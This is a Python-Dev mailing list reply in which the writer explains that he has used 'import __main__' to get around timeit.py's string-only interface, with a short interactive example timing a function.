Giovanni Bajo <[EMAIL PROTECTED]> wrote: > Real-world usage case for import __main__? Otherwise, I say screw it :) I have used it as a workaround for timeit.py's requirement that I pass it strings instead of functions. >>> def compute(): ... 1+1 ... >>> import timeit >>> t = timeit.Timer("__main__.compute()", "import __main__") >>> t.timeit() 1.9755008220672607 >>> You can argue (as many have) that timeit.py needs a better API for this. That's a different world than the existing real one. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com